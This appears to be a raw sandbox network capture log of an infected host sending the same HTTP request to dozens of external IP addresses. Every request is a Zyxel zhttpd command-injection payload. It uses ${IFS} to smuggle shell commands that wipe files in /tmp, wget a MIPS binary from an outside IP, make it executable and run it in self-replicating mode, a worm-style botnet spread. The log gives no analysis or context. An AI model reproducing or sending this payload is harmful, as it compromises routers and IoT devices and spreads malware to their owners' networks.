                                          Jan 14, 2024 15:46:00.700889111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          620192.168.2.234586231.193.188.210443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.700891972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          621192.168.2.2351188183.104.82.22443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.700953007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          622192.168.2.2342556185.117.232.182443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.700963020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          623192.168.2.2351190186.97.193.180443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.700978041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          624192.168.2.2360444191.22.23.141443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.701030016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          625192.168.2.2345828120.159.67.218443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.701060057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          626192.168.2.2359730115.87.86.56443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.701116085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          627192.168.2.2359390193.72.181.176443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.701119900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          628192.168.2.2334902163.102.14.188443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.701157093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          629192.168.2.234932467.160.181.119443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.701157093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          630192.168.2.234040019.153.137.247443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.701219082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          631192.168.2.2341476121.4.139.212443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.701225042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          632192.168.2.233468620.80.128.28443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.701271057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          633192.168.2.234081437.65.129.152443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.701302052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          634192.168.2.2342562218.239.107.54443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.701302052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          635192.168.2.235974438.49.38.155443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.701312065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          636192.168.2.2346088198.129.126.159443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.701339960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          637192.168.2.2359118111.70.166.179443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.701373100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          638192.168.2.234563089.141.190.238443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.701411009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          639192.168.2.235682420.44.44.215443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.701455116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          640192.168.2.2355118209.130.146.134443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.701463938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          641192.168.2.2345760148.227.168.187443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.701484919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          642192.168.2.236053441.197.140.92443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.701514959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          643192.168.2.234119219.211.31.159443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.701534986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          644192.168.2.2345340103.224.182.128443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.701541901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          645192.168.2.235835082.202.104.160443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.701589108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          646192.168.2.234588095.86.177.29443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.701620102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          647192.168.2.235876431.175.16.110443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.701664925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          648192.168.2.235510448.187.140.246443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.701673031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          649192.168.2.2344066110.27.187.217443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.701702118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          650192.168.2.2342190184.135.119.18443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.701705933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          651192.168.2.235387813.37.11.254443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.701714993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          652192.168.2.2346900213.78.34.135443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.701770067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          653192.168.2.2333354130.96.3.220443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.701783895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          654192.168.2.234288653.151.100.78443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.701806068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          655192.168.2.2333292104.13.89.181443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.701836109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          656192.168.2.234674417.99.201.57443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.701863050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          657192.168.2.2334950155.86.154.82443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.701906919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          658192.168.2.235556651.107.205.101443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.701942921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          659192.168.2.2334884165.246.220.100443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.701955080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          660192.168.2.2345134161.137.233.169443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.701968908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          661192.168.2.2346856108.249.107.236443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.701996088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          662192.168.2.234804835.61.22.186443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.702039003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          663192.168.2.2343632142.81.165.190443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.702050924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          664192.168.2.2354734150.158.126.105443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.702061892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          665192.168.2.2345628205.190.119.200443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.702097893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          666192.168.2.2336642200.140.162.94443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.702120066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          667192.168.2.2349844222.173.66.53443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.702155113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          668192.168.2.2339006154.87.189.67443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.702163935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          669192.168.2.2334646130.30.103.249443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.702193975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          670192.168.2.2345910222.145.202.88443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.704632998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          671192.168.2.2359516156.68.51.84443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.704673052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          672192.168.2.2355648158.111.209.237443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.704687119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          673192.168.2.233334841.228.84.186443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.704952002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          674192.168.2.2344884161.215.19.122443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.704965115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          675192.168.2.2346558137.138.224.123443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:00.704988003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          676192.168.2.2347756130.223.166.102443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.704157114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          677192.168.2.233859071.45.120.146443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.704205036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          678192.168.2.2346068150.19.51.46443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.704236984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          679192.168.2.233494092.93.60.90443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.704268932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          680192.168.2.2354324203.178.147.181443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.704303980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          681192.168.2.2348356200.213.170.160443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:01.704325914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          682192.168.2.2359666183.165.207.58443
                                          TimestampBytes transferredDirectionData
